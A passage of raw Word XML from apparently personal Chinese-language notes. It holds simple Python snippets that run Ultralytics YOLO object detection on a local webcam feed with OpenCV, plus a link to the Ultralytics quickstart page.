          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'random_frame.jpg'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cv2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>imwrite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(address, frame)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B175D2A" w14:textId="77777777" w:rsidR="00D778E3" w:rsidRPr="00D778E3" w:rsidRDefault="00D778E3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="033F206E" w14:textId="77777777" w:rsidR="00F27BBE" w:rsidRDefault="00F27BBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F41001D" w14:textId="77777777" w:rsidR="00F27BBE" w:rsidRDefault="00F27BBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35C0D3AF" w14:textId="77777777" w:rsidR="00F27BBE" w:rsidRDefault="00F27BBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42198882" w14:textId="77777777" w:rsidR="00F27BBE" w:rsidRDefault="00F27BBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="796D0C04" w14:textId="77777777" w:rsidR="00F27BBE" w:rsidRDefault="00F27BBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41EAACE6" w14:textId="77777777" w:rsidR="00F27BBE" w:rsidRDefault="00F27BBE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A3191DB" w14:textId="77777777" w:rsidR="00634F46" w:rsidRDefault="00634F46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52382C10" w14:textId="360BD939" w:rsidR="00FF4D1F" w:rsidRDefault="009C17B7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="627" w:name="_Toc159780057"/>
      <w:r w:rsidRPr="009C17B7">
        <w:lastRenderedPageBreak/>
        <w:t>github.com/ultralytics/yolov5</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>视频处理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="627"/>
    </w:p>
    <w:p w14:paraId="080C0E17" w14:textId="7C052330" w:rsidR="009C17B7" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="628" w:name="_Toc159780058"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试摄像头</w:t>
      </w:r>
      <w:bookmarkEnd w:id="628"/>
    </w:p>
    <w:p w14:paraId="5C692C40" w14:textId="1569172B" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>李顺给了两段，但是没测试，因为已经能运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lishun_try.py </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F496D5C" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C7248D4" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>from ultralytics import YOLO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3760C907" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import cv2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170CED7C" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import numpy as np</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FF5CA6" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10924BC3" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57712A31" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B6C760A" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>models = YOLO('./yolov5n.pt')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF9281C" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4384A924" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化摄像头</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5359A45E" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>cap = cv2.VideoCapture(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31037F45" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E363ABA" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>i = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3177E868" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601BBAEA" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取摄像头帧</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DE9ABF" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ret, frame = cap.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E34EE7" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    results = models(frame, verbose=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B56D2A1" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示实时视频流</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDB34BF" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    cv2.imshow('Real-time Detection', frame)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50833716" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if i % 10 ==1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E52D91" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        print('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:', results)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77120710" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        i %= 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A5E687" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    i += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C898A4E" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038BB432" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'q'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键退出循环</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218C9E2F" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if cv2.waitKey(1) &amp; 0xFF == ord('q'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9D3782" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C67462C" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50FBFEEB" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>释放摄像头资源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6F5DCD" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>cap.release()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523CDC49" w14:textId="416E78E9" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>cv2.destroyAllWindows()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21625CE7" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRPr="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F488B0" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import cv2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2C8D18" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E2DC4A8" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CDE534B" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="282E649A" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16D62145" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化摄像头</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC705D2" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>cap = cv2.VideoCapture(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01371426" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="390C9487" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>i = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AAC4A7" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C471627" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取摄像头帧</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E29CE0E" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ret, frame = cap.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D2BA8B" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示实时视频流</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734B1699" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    cv2.imshow('Real-time Detection', frame)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AEDCF3" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="295F2960" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'q'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>键退出循环</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C30C36" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if cv2.waitKey(1) &amp; 0xFF == ord('q'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB84045" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8669EF" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="419AF1FB" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>释放摄像头资源</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70420332" w14:textId="77777777" w:rsidR="00ED7702" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>cap.release()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332AAE14" w14:textId="2F818D47" w:rsidR="009C17B7" w:rsidRDefault="00ED7702" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>cv2.destroyAllWindows()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46922B75" w14:textId="02951506" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="003D1116">
        <w:t>github.com/ultralytics/ultralytics</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>视频处理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479D3789" w14:textId="2782AD80" w:rsidR="009C17B7" w:rsidRDefault="003D1116" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="003D1116">
        <w:t>https://docs.ultralytics.com/quickstart/#install-ultralytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422E01E4" w14:textId="77777777" w:rsidR="009C17B7" w:rsidRDefault="009C17B7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B8574F4" w14:textId="77777777" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E491ED" w14:textId="77777777" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10BF1069" w14:textId="77777777" w:rsidR="003D1116" w:rsidRPr="009C17B7" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE5416C" w14:textId="77777777" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="520B8554" w14:textId="77777777" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F06D118" w14:textId="77777777" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63903692" w14:textId="77777777" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E8A695D" w14:textId="77777777" w:rsidR="003D1116" w:rsidRPr="009C17B7" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EF8E4F6" w14:textId="77777777" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D74727A" w14:textId="77777777" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7758AC9A" w14:textId="77777777" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FE27A92" w14:textId="77777777" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E84F8CC" w14:textId="77777777" w:rsidR="003D1116" w:rsidRPr="009C17B7" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E498811" w14:textId="77777777" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45F5EBD6" w14:textId="77777777" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06654DA8" w14:textId="77777777" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7760E27F" w14:textId="77777777" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ADE1261" w14:textId="77777777" w:rsidR="003D1116" w:rsidRPr="009C17B7" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1473F0FA" w14:textId="77777777" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EF06337" w14:textId="77777777" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="271AF7E5" w14:textId="77777777" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50A4C789" w14:textId="77777777" w:rsidR="003D1116" w:rsidRDefault="003D1116" w:rsidP="003D1116">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
